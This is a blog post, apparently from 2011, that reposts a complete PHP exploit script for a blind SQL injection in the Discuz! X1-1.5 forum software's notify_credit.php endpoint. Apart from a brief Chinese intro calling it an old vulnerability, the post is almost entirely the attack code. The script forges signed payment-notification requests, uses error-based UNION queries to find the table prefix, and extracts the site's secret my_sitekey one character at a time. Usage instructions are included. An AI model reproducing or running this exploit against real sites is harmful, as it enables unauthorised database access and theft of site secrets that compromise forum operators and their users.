分类
站内搜索
访问统计(起于2010/10/2)
PortWatcher's Blog
Monday, 2025-06-30, 9:21 AM
Welcome Guest
Welcome Guest
Blog
Main » 2011 June 03 » Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit12:22 PM Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit |
| 其实这个漏洞很早很早就有了,只是一直没和广大群众见面。算个Nday Code <?php print_r(' +---------------------------------------------------------------------------+ Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57 2010.11.05 mail: toby57 at 163 dot com team: http://www.wolvez.org +---------------------------------------------------------------------------+ '); if ($argc < 2) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' url [pre] Example: php '.$argv[0].' http://localhost/ php '.$argv[0].' http://localhost/ xss_ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $url = $argv[1]; $pre = $argv[2]?$argv[2]:'pre_'; $target = parse_url($url); extract($target); $path .= '/api/trade/notify_credit.php'; $hash = array(); $hash = array_merge($hash, range(48, 57)); $hash = array_merge($hash, range(97, 102)); $tmp_expstr = "'"; $res = send(); if(strpos($res,'SQL syntax')==false){var_dump($res);die('Oooops.I can NOT hack it.');} preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match); if($match[1])$pre = $match[1]; $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE ''='"; $res = send(); if(strpos($res,"doesn't exist")!==false){ echo "Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n"; for($i = 1;$i<20;$i++){ $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',''))=$i AND ''='"; $res = send(); if(strpos($res,'SQL syntax')!==false){ $pre = ''; $hash2 = array(); $hash2 = array_merge($hash2, range(48, 57)); $hash2 = array_merge($hash2, range(97, 122)); $hash2[] = 95; for($j = 1;$j <= $i; $j++){ for ($k = 0; $k <= 255; $k++) { if(in_array($k, $hash2)) { $char = dechex($k); $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',''),$j,1)=0x{$char} AND ''='"; $res = send(); if(strpos($res,'SQL syntax')!==false){ echo chr($k); $pre .= chr($k);break; } } } } if(strlen($pre)){echo "\nCracked...Table_Pre:".$pre."\n";break;}else{die('GET Table_pre Failed..');}; } } }; echo "Please Waiting....\n"; $sitekey = ''; for($i = 1;$i <= 32; $i++){ for ($k = 0; $k <= 255; $k++) { if(in_array($k, $hash)) { $char = dechex($k); $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ''='"; $res = send(); if(strpos($res,'SQL syntax')!==false){ echo chr($k); $sitekey .= chr($k);break; }}}} if(strlen($sitekey)!=32)die("\n".'can NOT get the my_sitekey..'); echo "\n".'Exploit Successfully.'."\nmy_sitekey:{$sitekey}"; exit; function sign($exp_str){ return md5("attach=tenpay&mch_vno={$exp_str}&retcode=0&key="); } function send(){ global $host, $path, $tmp_expstr; $expdata = "attach=tenpay&retcode=0&trade_no=%2527&mch_vno=".urlencode(urlencode($tmp_expstr))."&sign=".sign($tmp_expstr); $data = "POST $path HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Content-Length: ".strlen($expdata)."\r\n"; $data .= "Connection: Close\r\n\r\n"; $data .= $expdata; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> |
|
|
| Total comments: 5 | ||||||
| ||||||
admin@portwatcher.net | 